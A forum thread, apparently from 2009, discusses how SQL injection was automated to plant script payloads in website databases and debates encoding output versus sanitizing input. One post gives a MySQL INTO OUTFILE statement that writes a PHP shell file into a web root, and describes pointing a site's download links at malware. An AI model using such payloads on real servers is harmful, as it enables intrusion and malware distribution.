[sagemagic]

I was reading an article about how SQl injection is spreading, and it mentioned a new(possibly?) type of attack, it says

Quote

"SQL attacks take aim at the database layer of websites. They typically were manual attacks designed to pilfer customer data from merchant websites. But last June someone figured out how to automate the attacks, and use them to plant infections.


"It was a brilliant tactical move. You sit back and wait for someone to visit the site, and soon you infect thousands of PCs," says Ryan Barnett, Breach Security's director of research. "

So is it kind of like a cross between XSS and sql injection? Does anybody know exactly what there talking about, because they didn't go into details

article

[Kane]

From how I interpret that quote, what they're talking about is really nothing ground breaking.

They're saying that, by using SQL Injection, you can inject HTML code into a website and when it gets pulled from the database and echoed to the client, it will execute. Basically allowing you to XSS their website.

The problem with this is, if the website designer has any sense, the XSS filtering will take place when the DB data is echoed out. Not before it's uploaded. So this won't cause any harm at all. If the XSS filtering is done before the user data is saved to the DB, then yes. This could allow for persistent attacks. That's unlikely, though.

Take this forum, for instance. What I'm typing now is going to be saved to the CS database. It's very likely that my text will be filtered/sanitized before being saved. When it gets echoed out (and you can read it) the sanitizing will take place. In this case, finding an SQLi vulnerability would mean no damage (XSS wise) to the site.

There are instances, though, where something similar can be used for such purposes. Not that long ago, I remember some .tw website for virus protection software had an SQL vulnerability. The link looked something similar to www.virusprotection.tw/downloads.php?id=10. An attacker was/would be able to edit the database and point the download link to a file of his choosing. So when a user went to download virus protection software, they could be downloading a virus itself.

I think that covers what you're asking...

On a side note, certain DBM's allow for file system access depending on the user privileges the DBM is running under. MySQL, for instance, has the INTO OUTFILE function that can be used to write files to the server.
For instance, SELECT '<?php echo `[removed] /`; ?>' INTO OUTFILE('/var/www/mysite/shell.php')

In a bit of a rush, so hope that helps.

[talwoasc]

Oops... I always sanitize before inputting data into my database (as in my_sql_real_escape) so that the data cannot fiddle with my query by putting quotes in places that they shouldn't be.

[Kane]

Well, yes, SQL queries should be sanitized. I was refering to HTML entities.

<b>this text</b> can be seen by you as unrendered HTML. As, in the source of this page, you'll see &lt;b&gt;this text&lt;/&gt; - That encoding takes place when the data is echoed out. Not upon uploading :>

[talwoasc]

Got ya now :) And yes I do remove certain bits like pesky javascript as the text is HTML anyway

[digi7al64]

I didn't read the article but I assume you are talking about the mass sql injection attacks against sites that occured some time ago.

Essentially, the hackers found a sql injection in various cms's that allowed them to save a html payload into the database that was echo'd back to the user on the home page.

This payload contained a exploit initialisation process via javascript.

The difference between this and other attacks (besides the sheer number of sites attacked) was that the entire process was automated with target sites found using SERP.

[henke37]

Kane, on Jun 19 2009, 06:27 PM, said:

That encoding takes place when the data is echoed out. Not upon uploading :>

Actually, IPB stores preprocessed posts.